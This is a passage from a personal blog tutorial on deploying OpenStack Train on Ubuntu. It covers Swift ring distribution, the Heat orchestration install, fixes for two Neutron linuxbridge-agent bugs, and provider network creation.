<p>We can rebalance with:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ sudo swift-ring-builder object.builder rebalance
Reassigned 3072 (300.00%) partitions. Balance is now 0.00. Dispersion is now 0.00
</code></pre></div></div>
<p>If you look in <code class="language-plaintext highlighter-rouge">/etc/swift</code>, there is now some compressed archives:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ ll /etc/swift
total 116
drwxr-xr-x 3 root root 4096 Feb 6 00:22 ./
drwxr-xr-x 121 root root 4096 Feb 4 23:05 ../
-rw-r--r-- 1 root root 9827 Feb 6 00:13 account.builder
-rw-r--r-- 1 root root 1475 Feb 6 00:13 account.ring.gz
drwxr-xr-x 2 root root 4096 Feb 6 00:22 backups/
-rw-r--r-- 1 root root 9827 Feb 6 00:18 container.builder
-rw-r--r-- 1 root root 1489 Feb 6 00:18 container.ring.gz
-rw-r--r-- 1 root root 9827 Feb 6 00:22 object.builder
-rw-r--r-- 1 root root 1471 Feb 6 00:22 object.ring.gz
-rw-r--r-- 1 root root 53820 Feb 4 23:23 proxy-server.conf
</code></pre></div></div>
<p>These need to be copied to each of the object storage nodes. Lets do that.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ for x in 10.0.0.41 10.0.0.51; do scp *.ring.gz ubuntu@$x:~/;done
ubuntu@10.0.0.41's password:
account.ring.gz 100% 1475 562.7KB/s 00:00
container.ring.gz 100% 1489 3.1MB/s 00:00
object.ring.gz 100% 1471 2.3MB/s 00:00
ubuntu@10.0.0.51's password:
account.ring.gz 100% 1475 607.6KB/s 00:00
container.ring.gz 100% 1489 3.7MB/s 00:00
object.ring.gz 100% 1471 2.8MB/s 00:00
</code></pre></div></div>
<p>Now log onto both the object storage nodes and move the archives to <code class="language-plaintext highlighter-rouge">/etc/swift</code>:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ sudo mv *.ring.gz /etc/swift
</code></pre></div></div>
<h3 id="setting-up-the-master-swift-configuration">Setting up the Master Swift Configuration</h3>
<p>The last thing we need to do is to set up the master configuration for Swift.
SSH into your controller node, and let’s do it:</p>
<p>Change into the <code class="language-plaintext highlighter-rouge">/etc/swift</code> directory.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ cd /etc/swift
</code></pre></div></div>
<p>Download the config file:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ sudo curl -o /etc/swift/swift.conf \
https://opendev.org/openstack/swift/raw/branch/master/etc/swift.conf-sample
</code></pre></div></div>
<p>We need to generate two secrets, which we will again do with <code class="language-plaintext highlighter-rouge">openssl</code>:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ openssl rand -hex 6
6243f9946d1e
$ openssl rand -hex 6
69bab31f606c
</code></pre></div></div>
<p>And edit <code class="language-plaintext highlighter-rouge">/etc/swift/swift.conf</code>:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ sudo vim /etc/swift/swift.conf
[swift-hash]
swift_hash_path_suffix = 6243f9946d1e
swift_hash_path_prefix = 69bab31f606c
[storage-policy:0]
name = Policy-0
default = yes
</code></pre></div></div>
<p>From there, this <code class="language-plaintext highlighter-rouge">/etc/swift/swift.conf</code> file needs to be distributed to all the
object storage nodes:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ for x in 10.0.0.41 10.0.0.51; do scp /etc/swift/swift.conf ubuntu@$x:~/; done
ubuntu@10.0.0.41's password:
swift.conf 100% 8451 2.9MB/s 00:00
ubuntu@10.0.0.51's password:
swift.conf 100% 8451 1.7MB/s 00:00
</code></pre></div></div>
<p>Then SSH into each of the object storage nodes and move the file to
<code class="language-plaintext highlighter-rouge">/etc/swift/swift.conf</code>:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ sudo mv swift.conf /etc/swift/swift.conf
$ sudo chown -R root:swift /etc/swift
</code></pre></div></div>
<p>Lastly, we need to restart the services:</p>
<p>On the controller:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ sudo systemctl restart memcached
$ sudo systemctl restart swift-proxy
</code></pre></div></div>
<p>On the object storage nodes:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ sudo swift-init all start
</code></pre></div></div>
<h3 id="verifying-swift-was-installed-correctly">Verifying Swift Was Installed Correctly</h3>
<p>We can see if swift is working correctly by making a container and placing
an object in it. Do the following on the controller node:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ . demo-openrc
$ swift stat
Account: AUTH_33569bb56110474db2d584b4a1936c6b
Containers: 0
Objects: 0
Bytes: 0
Content-Type: text/plain; charset=utf-8
X-Timestamp: 1580951741.32857
X-Put-Timestamp: 1580951741.32857
X-Trans-Id: tx0dec10331bb941488a804-005e3b68bc
X-Openstack-Request-Id: tx0dec10331bb941488a804-005e3b68bc
</code></pre></div></div>
<p>Now we will make a container, make a file, and place it in the container:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ openstack container create container1
+---------------------------------------+------------+------------------------------------+
| account | container | x-trans-id |
+---------------------------------------+------------+------------------------------------+
| AUTH_33569bb56110474db2d584b4a1936c6b | container1 | txc383885cf6d44d2fb3f07-005e3b6a65 |
+---------------------------------------+------------+------------------------------------+
$ echo "Test for Demo user" > test_file.txt
$ openstack object create container1 test_file.txt
+---------------+------------+----------------------------------+
| object | container | etag |
+---------------+------------+----------------------------------+
| test_file.txt | container1 | ffc8c08a288fd4d5b11804fc331909b7 |
+---------------+------------+----------------------------------+
$ openstack object list container1
+---------------+
| Name |
+---------------+
| test_file.txt |
+---------------+
</code></pre></div></div>
<p>We can download the file and view it with:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ mkdir test
$ cd test
$ openstack object save container1 test_file.txt
$ cat test_file.txt
Test for Demo user
</code></pre></div></div>
<p>It worked! We can now delete the file with:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ openstack object delete container1 test_file.txt
</code></pre></div></div>
<h2 id="installing-heat-the-orchestration-service">Installing Heat, the Orchestration Service</h2>
<p>Heat is the orchestration service for OpenStack. Heat takes input in a form of
templates which describe the deployment specifications for an application. You
can specify what sort of virtual machines are required, their storage needs and
network topologies, and Heat will go and make the infrastructure needed a reality.</p>
<p>Heat can manage the entire lifecycle of an application, from the initial deployment
to changing requirements midway through, and to tearing down.</p>
<p>Heat directly interacts with the OpenStack API endpoints of the major services
to manage infrastructure.</p>
<p>I will be following the <a href="https://docs.openstack.org/heat/train/install/install-ubuntu.html">Install Documentation</a>.</p>
<h3 id="creating-the-heat-database">Creating the Heat Database</h3>
<p>Heat, like most OpenStack services need a database, so let’s make one on the
Controller:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ sudo mysql
MariaDB [(none)]> CREATE DATABASE heat;
Query OK, 1 row affected (0.012 sec)
</code></pre></div></div>
<p>Add the heat user and grant privileges:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>MariaDB [(none)]> GRANT ALL PRIVILEGES ON heat.* TO 'heat'@'localhost' \
IDENTIFIED BY 'password123';
Query OK, 1 row affected (0.012 sec)
MariaDB [(none)]> GRANT ALL PRIVILEGES ON heat.* TO 'heat'@'%' \
IDENTIFIED BY 'password123';
Query OK, 1 row affected (0.012 sec)
</code></pre></div></div>
<h3 id="creating-the-heat-user-and-services">Creating the Heat User and Services</h3>
<p>Lets make a user for Heat:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ . admin-openrc
$ openstack user create --domain default --password-prompt heat
User Password:
Repeat User Password:
+---------------------+----------------------------------+
| Field | Value |
+---------------------+----------------------------------+
| domain_id | default |
| enabled | True |
| id | 3c8ca893913742619ed257ad0553b489 |
| name | heat |
| options | {} |
| password_expires_at | None |
+---------------------+----------------------------------+
$ openstack role add --project service --user heat admin
</code></pre></div></div>
<p>Heat needs two services to be created: <code class="language-plaintext highlighter-rouge">heat</code> and <code class="language-plaintext highlighter-rouge">heat-cfn</code>.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ openstack service create --name heat --description "Orchestration" orchestration
+-------------+----------------------------------+
| Field | Value |
+-------------+----------------------------------+
| description | Orchestration |
| enabled | True |
| id | 41cc3e7d6b634e80b31f1a88c4472aab |
| name | heat |
| type | orchestration |
+-------------+----------------------------------+
$ openstack service create --name heat-cfn --description "Orchestration" cloudformation
+-------------+----------------------------------+
| Field | Value |
+-------------+----------------------------------+
| description | Orchestration |
| enabled | True |
| id | d2fad2c90d9d4f16afeb26d5c7c29bbc |
| name | heat-cfn |
| type | cloudformation |
+-------------+----------------------------------+
</code></pre></div></div>
<p>Since we created two services, we now need to define two sets of endpoints. The
first for <code class="language-plaintext highlighter-rouge">heat</code>:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ openstack endpoint create --region RegionOne orchestration public http://controller:8004/v1/%\(tenant_id\)s
+--------------+-----------------------------------------+
| Field | Value |
+--------------+-----------------------------------------+
| enabled | True |
| id | e33e7674797a497dbc1e5d425add3992 |
| interface | public |
| region | RegionOne |
| region_id | RegionOne |
| service_id | 41cc3e7d6b634e80b31f1a88c4472aab |
| service_name | heat |
| service_type | orchestration |
| url | http://controller:8004/v1/%(tenant_id)s |
+--------------+-----------------------------------------+
$ openstack endpoint create --region RegionOne orchestration internal http://controller:8004/v1/%\(tenant_id\)s
+--------------+-----------------------------------------+
| Field | Value |
+--------------+-----------------------------------------+
| enabled | True |
| id | 67df0a3ade9d4322865daa20b87ac082 |
| interface | internal |
| region | RegionOne |
| region_id | RegionOne |
| service_id | 41cc3e7d6b634e80b31f1a88c4472aab |
| service_name | heat |
| service_type | orchestration |
| url | http://controller:8004/v1/%(tenant_id)s |
+--------------+-----------------------------------------+
$ openstack endpoint create --region RegionOne orchestration admin http://controller:8004/v1/%\(tenant_id\)s
+--------------+-----------------------------------------+
| Field | Value |
+--------------+-----------------------------------------+
| enabled | True |
| id | 7f16502e18994f45a39fb40443636c8c |
| interface | admin |
| region | RegionOne |
| region_id | RegionOne |
| service_id | 41cc3e7d6b634e80b31f1a88c4472aab |
| service_name | heat |
| service_type | orchestration |
| url | http://controller:8004/v1/%(tenant_id)s |
+--------------+-----------------------------------------+
</code></pre></div></div>
<p>The second for <code class="language-plaintext highlighter-rouge">heat-cfn</code>:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ openstack endpoint create --region RegionOne cloudformation public http://controller:8000/v1
+--------------+----------------------------------+
| Field | Value |
+--------------+----------------------------------+
| enabled | True |
| id | a9944905d2474773a6f2604619ab86e3 |
| interface | public |
| region | RegionOne |
| region_id | RegionOne |
| service_id | d2fad2c90d9d4f16afeb26d5c7c29bbc |
| service_name | heat-cfn |
| service_type | cloudformation |
| url | http://controller:8000/v1 |
+--------------+----------------------------------+
$ openstack endpoint create --region RegionOne cloudformation internal http://controller:8000/v1
+--------------+----------------------------------+
| Field | Value |
+--------------+----------------------------------+
| enabled | True |
| id | 587390973b9f4817a8ad2e27b04373b9 |
| interface | internal |
| region | RegionOne |
| region_id | RegionOne |
| service_id | d2fad2c90d9d4f16afeb26d5c7c29bbc |
| service_name | heat-cfn |
| service_type | cloudformation |
| url | http://controller:8000/v1 |
+--------------+----------------------------------+
$ openstack endpoint create --region RegionOne cloudformation admin http://controller:8000/v1
+--------------+----------------------------------+
| Field | Value |
+--------------+----------------------------------+
| enabled | True |
| id | a6494f8979e44921b85cd6595e136837 |
| interface | admin |
| region | RegionOne |
| region_id | RegionOne |
| service_id | d2fad2c90d9d4f16afeb26d5c7c29bbc |
| service_name | heat-cfn |
| service_type | cloudformation |
| url | http://controller:8000/v1 |
+--------------+----------------------------------+
</code></pre></div></div>
<p>Heat requires another domain to be able to manage its infrastructure, so we need
to create that, and an admin user and role for this new domain:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ openstack domain create --description "Stack projects and users" heat
+-------------+----------------------------------+
| Field | Value |
+-------------+----------------------------------+
| description | Stack projects and users |
| enabled | True |
| id | 1337b657083e4946996d55cf49ce80e0 |
| name | heat |
| options | {} |
| tags | [] |
+-------------+----------------------------------+
$ openstack user create --domain heat --password-prompt heat_domain_admin
User Password:
Repeat User Password:
+---------------------+----------------------------------+
| Field | Value |
+---------------------+----------------------------------+
| domain_id | 1337b657083e4946996d55cf49ce80e0 |
| enabled | True |
| id | 81277e90fa7341aea05224e59adbd6ea |
| name | heat_domain_admin |
| options | {} |
| password_expires_at | None |
+---------------------+----------------------------------+
$ openstack role add --domain heat --user-domain heat --user heat_domain_admin admin
$ openstack role create heat_stack_owner
+-------------+----------------------------------+
| Field | Value |
+-------------+----------------------------------+
| description | None |
| domain_id | None |
| id | 1625641497494370b0f98e6d1dcb0b2e |
| name | heat_stack_owner |
| options | {} |
+-------------+----------------------------------+
$ openstack role add --project demo --user demo heat_stack_owner
$ openstack role create heat_stack_user
+-------------+----------------------------------+
| Field | Value |
+-------------+----------------------------------+
| description | None |
| domain_id | None |
| id | 8dfebc17aa4f45b5b5ed1e4be35ce98b |
| name | heat_stack_user |
| options | {} |
+-------------+----------------------------------+
</code></pre></div></div>
<h3 id="installing-and-configuring-heat-on-the-controller">Installing and Configuring Heat on the Controller</h3>
<p>Once all the users, services and endpoints are set up, we can install the Heat
packages and start configuration.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ sudo apt install heat-api heat-api-cfn heat-engine
</code></pre></div></div>
<p>Lets configure:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ sudo vim /etc/heat/heat.conf
[database]
connection = mysql+pymysql://heat:password123@controller/heat
[DEFAULT]
transport_url = rabbit://openstack:password123@controller
heat_metadata_server_url = http://controller:8000
heat_waitcondition_server_url = http://controller:8000/v1/waitcondition
stack_domain_admin = heat_domain_admin
stack_domain_admin_password = openstack
stack_user_domain_name = heat
</code></pre></div></div>
<p>Then, we just need to configure Keystone:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>[keystone_authtoken]
www_authenticate_uri = http://controller:5000
auth_url = http://controller:5000
memcached_servers = controller:11211
auth_type = password
project_domain_name = default
user_domain_name = default
project_name = service
username = heat
password = openstack
[trustee]
auth_type = password
auth_url = http://controller:5000
username = heat
password = openstack
user_domain_name = default
[clients_keystone]
auth_uri = http://controller:5000
</code></pre></div></div>
<p>Save the file, then populate the database with:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ sudo -s
# su -s /bin/sh -c "heat-manage db_sync" heat
</code></pre></div></div>
<p>Finally, restart the Heat services:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ sudo systemctl restart heat-api
$ sudo systemctl restart heat-api-cfn
$ sudo systemctl restart heat-engine
</code></pre></div></div>
<p>We can verify everything is working as intended by listing the services:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ openstack orchestration service list
+------------+-------------+--------------------------------------+------------+--------+----------------------------+--------+
| Hostname | Binary | Engine ID | Host | Topic | Updated At | Status |
+------------+-------------+--------------------------------------+------------+--------+----------------------------+--------+
| controller | heat-engine | 993cff41-f3cf-45d3-9f38-d09e04fff701 | controller | engine | 2020-02-06T03:09:12.000000 | up |
| controller | heat-engine | 1640f217-da50-4565-b6e1-cdbc26a688a7 | controller | engine | 2020-02-06T03:09:12.000000 | up |
| controller | heat-engine | 2051654e-bb5d-45c5-9d48-5e83cfea4e04 | controller | engine | 2020-02-06T03:09:12.000000 | up |
| controller | heat-engine | d19f1626-5830-452f-a198-071950d88a1d | controller | engine | 2020-02-06T03:09:12.000000 | up |
+------------+-------------+--------------------------------------+------------+--------+----------------------------+--------+
</code></pre></div></div>
<h1 id="bugs-i-encountered-and-how-to-fix-them">Bugs I Encountered and How to Fix Them</h1>
<p>Right at the very end, after the next section, when I tried to launch an instance
I ran into problems and my instances kept failing to launch. After a bit of
debugging it turned out that I had experienced two separate bugs in Neutron.</p>
<h2 id="neutron-on-the-controller-node-keyerror-gateway">Neutron on the Controller Node: KeyError: ‘gateway’</h2>
<p>After reviewing <code class="language-plaintext highlighter-rouge">/var/log/neutron/neutron-linuxbridge-agent.log</code> on the controller
node, I saw: (full error for those googling for help in the future =D ).</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>ERROR neutron.plugins.ml2.drivers.agent._common_agent [req-94658efb-0dd2-4c95-94ba-85b2ee8c49c2 - - - - -] Error in agent loop. Devices info: {'current': {'tapee2ba6c7-78'}, 'timesta
mps': {'tapee2ba6c7-78': 5}, 'added': {'tapee2ba6c7-78'}, 'removed': set(), 'updated': set()}: KeyError: 'gateway'
Traceback (most recent call last):
File "/usr/lib/python3/dist-packages/neutron/plugins/ml2/drivers/agent/_common_agent.py", line 465, in daemon_loop
sync = self.process_network_devices(device_info)
File "/usr/lib/python3/dist-packages/osprofiler/profiler.py", line 160, in wrapper
result = f(*args, **kwargs)
File "/usr/lib/python3/dist-packages/neutron/plugins/ml2/drivers/agent/_common_agent.py", line 214, in process_network_devices
resync_a = self.treat_devices_added_updated(devices_added_updated)
File "/usr/lib/python3/dist-packages/osprofiler/profiler.py", line 160, in wrapper
result = f(*args, **kwargs)
File "/usr/lib/python3/dist-packages/neutron/plugins/ml2/drivers/agent/_common_agent.py", line 231, in treat_devices_added_updated
self._process_device_if_exists(device_details)
File "/usr/lib/python3/dist-packages/neutron/plugins/ml2/drivers/agent/_common_agent.py", line 258, in _process_device_if_exists
device, device_details['device_owner'])
File "/usr/lib/python3/dist-packages/neutron/plugins/ml2/drivers/linuxbridge/agent/linuxbridge_neutron_agent.py", line 586, in plug_interface
network_segment.mtu)
File "/usr/lib/python3/dist-packages/neutron/plugins/ml2/drivers/linuxbridge/agent/linuxbridge_neutron_agent.py", line 522, in add_tap_interface
return False
File "/usr/lib/python3/dist-packages/oslo_utils/excutils.py", line 220, in __exit__
self.force_reraise()
File "/usr/lib/python3/dist-packages/oslo_utils/excutils.py", line 196, in force_reraise
six.reraise(self.type_, self.value, self.tb)
File "/usr/lib/python3/dist-packages/six.py", line 693, in reraise
raise value
File "/usr/lib/python3/dist-packages/neutron/plugins/ml2/drivers/linuxbridge/agent/linuxbridge_neutron_agent.py", line 514, in add_tap_interface
tap_device_name, device_owner, mtu)
File "/usr/lib/python3/dist-packages/neutron/plugins/ml2/drivers/linuxbridge/agent/linuxbridge_neutron_agent.py", line 547, in _add_tap_interface
mtu):
File "/usr/lib/python3/dist-packages/neutron/plugins/ml2/drivers/linuxbridge/agent/linuxbridge_neutron_agent.py", line 498, in ensure_physical_in_bridge
physical_interface)
File "/usr/lib/python3/dist-packages/neutron/plugins/ml2/drivers/linuxbridge/agent/linuxbridge_neutron_agent.py", line 287, in ensure_flat_bridge
if self.ensure_bridge(bridge_name, physical_interface):
File "/usr/lib/python3/dist-packages/neutron/plugins/ml2/drivers/linuxbridge/agent/linuxbridge_neutron_agent.py", line 456, in ensure_bridge
self.update_interface_ip_details(bridge_name, interface)
File "/usr/lib/python3/dist-packages/neutron/plugins/ml2/drivers/linuxbridge/agent/linuxbridge_neutron_agent.py", line 418, in update_interface_ip_details
gateway)
File "/usr/lib/python3/dist-packages/neutron/plugins/ml2/drivers/linuxbridge/agent/linuxbridge_neutron_agent.py", line 402, in _update_interface_ip_details
dst_device.route.add_gateway(gateway=gateway['gateway'],
KeyError: 'gateway'
</code></pre></div></div>
<p>One of my team members linked me to this <a href="https://ask.openstack.org/en/question/125368/neutronpluginsml2driversagent_common_agent-keyerror-gateway/">Ask OpenStack</a>
page, since it lists the same problem. I tried using <code class="language-plaintext highlighter-rouge">brctl addif</code> to add the
new bridges to the interfaces, but it did not solve the problem.</p>
<p>After a bit more googling, I tracked down <a href="https://bugs.launchpad.net/neutron/+bug/1855759">Launchpad Bug #1855759</a>.</p>
<p>This is the exact problem I was hitting. Nice to see it got fixed upstream and
backported to upstream -stable for Neutron.</p>
<p>I manually modified the files under <code class="language-plaintext highlighter-rouge">/usr/lib/python3/dist-packages/neutron/</code>,
and applied the changes from the following commit to them:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>commit b99765df8f1d1d6d3ceee3d481d1e6ee1b2200e7
Author: Rodolfo Alonso Hernandez <ralonsoh@redhat.com>
Date: Tue Dec 10 15:50:20 2019 +0000
Subject: Use "via" in gateway dictionary in Linux Bridge agent
</code></pre></div></div>
<p>I used the <a href="https://opendev.org/openstack/neutron/commit/124680084c6f921b49df5da0095ff80053ca0e52">Backported Commit to Train</a>.</p>
<p>After that I restarted all Neutron services on the controller, and everything
worked.</p>
<p>Yes, I will make sure to SRU this fix to Eoan to help everyone out - watch this
space.</p>
<h2 id="neutron-on-the-compute-note-ebtables-unknown-argument-among-src">Neutron on the Compute Note: ebtables Unknown argument ‘–among-src’</h2>
<p>After reviewing <code class="language-plaintext highlighter-rouge">/var/log/neutron/neutron-linuxbridge-agent.log</code> on the compute
node, I saw: (full error for those googling for help in the future =D ).</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>ERROR neutron.plugins.ml2.drivers.agent._common_agent [req-91257a46-44ee-4246-b3b6-813d82f1c2d3 - - - - -] Error in agent loop. Devices info: {'current': {'tap5878f227-c9'}, 'timestamps': {'tap5878f227-c9': 13}, 'added': {'tap5878f227-c9'}, 'removed': set(), 'updated': set()}: neutron_lib.exceptions.ProcessExecutionError: Exit code: 2; Stdin: ; Stdout: ; Stderr: ebtables v1.8.3 (nf_tables): Unknown argument: '--among-src'
Try `ebtables -h' or 'ebtables --help' for more information.
Traceback (most recent call last):
File "/usr/lib/python3/dist-packages/neutron/plugins/ml2/drivers/agent/_common_agent.py", line 465, in daemon_loop
sync = self.process_network_devices(device_info)
File "/usr/lib/python3/dist-packages/osprofiler/profiler.py", line 160, in wrapper
result = f(*args, **kwargs)
File "/usr/lib/python3/dist-packages/neutron/plugins/ml2/drivers/agent/_common_agent.py", line 214, in process_network_devices
resync_a = self.treat_devices_added_updated(devices_added_updated)
File "/usr/lib/python3/dist-packages/osprofiler/profiler.py", line 160, in wrapper
result = f(*args, **kwargs)
File "/usr/lib/python3/dist-packages/neutron/plugins/ml2/drivers/agent/_common_agent.py", line 231, in treat_devices_added_updated
self._process_device_if_exists(device_details)
File "/usr/lib/python3/dist-packages/neutron/plugins/ml2/drivers/agent/_common_agent.py", line 246, in _process_device_if_exists
device_details)
File "/usr/lib/python3/dist-packages/neutron/plugins/ml2/drivers/linuxbridge/agent/linuxbridge_neutron_agent.py", line 865, in setup_arp_spoofing_protection
arp_protect.setup_arp_spoofing_protection(device, device_details)
File "/usr/lib/python3/dist-packages/neutron/plugins/ml2/drivers/linuxbridge/agent/arp_protect.py", line 42, in setup_arp_spoofing_protection
_setup_arp_spoofing_protection(vif, port_details)
File "/usr/lib/python3/dist-packages/oslo_concurrency/lockutils.py", line 328, in inner
return f(*args, **kwargs)
File "/usr/lib/python3/dist-packages/neutron/plugins/ml2/drivers/linuxbridge/agent/arp_protect.py", line 48, in _setup_arp_spoofing_protection
_install_mac_spoofing_protection(vif, port_details, current_rules)
File "/usr/lib/python3/dist-packages/neutron/plugins/ml2/drivers/linuxbridge/agent/arp_protect.py", line 184, in _install_mac_spoofing_protection
ebtables(new_rule)
File "/usr/lib/python3/dist-packages/tenacity/__init__.py", line 292, in wrapped_f
return self.call(f, *args, **kw)
File "/usr/lib/python3/dist-packages/tenacity/__init__.py", line 358, in call
do = self.iter(retry_state=retry_state)
File "/usr/lib/python3/dist-packages/tenacity/__init__.py", line 319, in iter
return fut.result()
File "/usr/lib/python3.7/concurrent/futures/_base.py", line 428, in result
return self.__get_result()
File "/usr/lib/python3.7/concurrent/futures/_base.py", line 384, in __get_result
raise self._exception
File "/usr/lib/python3/dist-packages/tenacity/__init__.py", line 361, in call
result = fn(*args, **kwargs)
File "/usr/lib/python3/dist-packages/neutron/plugins/ml2/drivers/linuxbridge/agent/arp_protect.py", line 232, in ebtables
run_as_root=True)
File "/usr/lib/python3/dist-packages/neutron/agent/linux/ip_lib.py", line 713, in execute
run_as_root=run_as_root)
File "/usr/lib/python3/dist-packages/neutron/agent/linux/utils.py", line 147, in execute
returncode=returncode)
neutron_lib.exceptions.ProcessExecutionError: Exit code: 2; Stdin: ; Stdout: ; Stderr: ebtables v1.8.3 (nf_tables): Unknown argument: '--among-src'
Try `ebtables -h' or 'ebtables --help' for more information.
</code></pre></div></div>
<p>It seems ebtables comes in both the <code class="language-plaintext highlighter-rouge">ebtables</code> and <code class="language-plaintext highlighter-rouge">iptables</code> packages, and at
different versions:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ ebtabls --version
Command 'ebtabls' not found, did you mean:
command 'ebtables' from deb ebtables (2.0.10.4+snapshot20181205-1ubuntu1)
command 'ebtables' from deb iptables (1.8.3-2ubuntu5)
Try: sudo apt install <deb name>
</code></pre></div></div>
<p>It seems <code class="language-plaintext highlighter-rouge">ebtables</code> is managed by <code class="language-plaintext highlighter-rouge">alternatives</code>:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ ll /usr/sbin/ebtables
16:12 lrwxrwxrwx 1 root root 26 Oct 17 13:09 /usr/sbin/ebtables -> /etc/alternatives/ebtables*
</code></pre></div></div>
<p>Lets change that:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ /usr/sbin/ebtables --version
ebtables 1.8.3 (nf_tables)
$ sudo update-alternatives --config ebtables
There are 2 choices for the alternative ebtables (providing /usr/sbin/ebtables).
Selection Path Priority Status
------------------------------------------------------------
* 0 /usr/sbin/ebtables-nft 10 auto mode
1 /usr/sbin/ebtables-legacy 10 manual mode
2 /usr/sbin/ebtables-nft 10 manual mode
Press <enter> to keep the current choice[*], or type selection number: 1
update-alternatives: using /usr/sbin/ebtables-legacy to provide /usr/sbin/ebtables (ebtables) in manual mode
$ ebtables --version
ebtables v2.0.10.4 (legacy) (December 2011)
</code></pre></div></div>
<p>Much better. Version 1.8.3 does not implement <code class="language-plaintext highlighter-rouge">among</code> and version 2.0.10.4
does. I highly recommend updating the <code class="language-plaintext highlighter-rouge">alternatives</code> for ebtables right now
if you are following this blog post.</p>
<p>After this, restart the Neutron services on the compute node.</p>
<h1 id="final-configuration">Final Configuration</h1>
<p>If you have made it this far, then congratulations. You have a cluster which is
nearly all set up and nearly ready to begin launching instances.</p>
<p>Before we can launch our first instance, we just need to set up some virtual
networks, add a keypair used for SSH, create some security group rules so we
aren’t firewalled out, and to create some instance flavours so we can launch
virtual machines of differing specifications.</p>
<h2 id="configuring-virtual-networks">Configuring Virtual Networks</h2>
<p>We need to tell OpenStack about our provider network on 203.0.113.0/24, and what
ranges of IP addresses we want to assign:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ . admin-openrc
$ openstack network create --share --provider-physical-network provider \
--provider-network-type flat provider
+---------------------------+---------------------------------------------------------------------------------------------------------------------------------------------------------+
| Field | Value |
+---------------------------+---------------------------------------------------------------------------------------------------------------------------------------------------------+
| admin_state_up | UP |
| availability_zone_hints | |
| availability_zones | |
| created_at | 2020-02-12T04:05:26Z |
| description | |
| dns_domain | None |
| id | 01ae2817-9697-430f-bdd4-6435d45dbbda |
| ipv4_address_scope | None |
| ipv6_address_scope | None |
| is_default | None |
| is_vlan_transparent | None |
| location | cloud='', project.domain_id=, project.domain_name='Default', project.id='a45f9c52c6964c5da7585f5c8a70fdc7', project.name='admin', region_name='', zone= |
| mtu | 1500 |
| name | provider |
| port_security_enabled | True |
| project_id | a45f9c52c6964c5da7585f5c8a70fdc7 |
| provider:network_type | flat |
| provider:physical_network | provider |
| provider:segmentation_id | None |
| qos_policy_id | None |
| revision_number | 1 |
| router:external | Internal |
| segments | None |
| shared | True |
| status | ACTIVE |
| subnets | |
| tags | |
| updated_at | 2020-02-12T04:05:26Z |
+---------------------------+---------------------------------------------------------------------------------------------------------------------------------------------------------+
$ openstack subnet create --network provider --allocation-pool start=203.0.113.101,end=203.0.113.250 --dns-nameserver 8.8.8.8 --gateway 203.0.113.1 --subnet-range 203.0.113.0/24 provider
+-------------------+---------------------------------------------------------------------------------------------------------------------------------------------------------+
| Field | Value |
+-------------------+---------------------------------------------------------------------------------------------------------------------------------------------------------+
| allocation_pools | 203.0.113.101-203.0.113.250 |
| cidr | 203.0.113.0/24 |
| created_at | 2020-02-12T04:05:37Z |
| description | |
| dns_nameservers | 8.8.8.8 |
| enable_dhcp | True |
| gateway_ip | 203.0.113.1 |
| host_routes | |
| id | 6e854541-fc59-4639-947b-a074efc05463 |
| ip_version | 4 |
| ipv6_address_mode | None |
| ipv6_ra_mode | None |
| location | cloud='', project.domain_id=, project.domain_name='Default', project.id='a45f9c52c6964c5da7585f5c8a70fdc7', project.name='admin', region_name='', zone= |
| name | provider |
| network_id | 01ae2817-9697-430f-bdd4-6435d45dbbda |
| prefix_length | None |
| project_id | a45f9c52c6964c5da7585f5c8a70fdc7 |
| revision_number | 0 |
| segment_id | None |
| service_types | |
| subnetpool_id | None |
| tags | |
| updated_at | 2020-02-12T04:05:37Z |
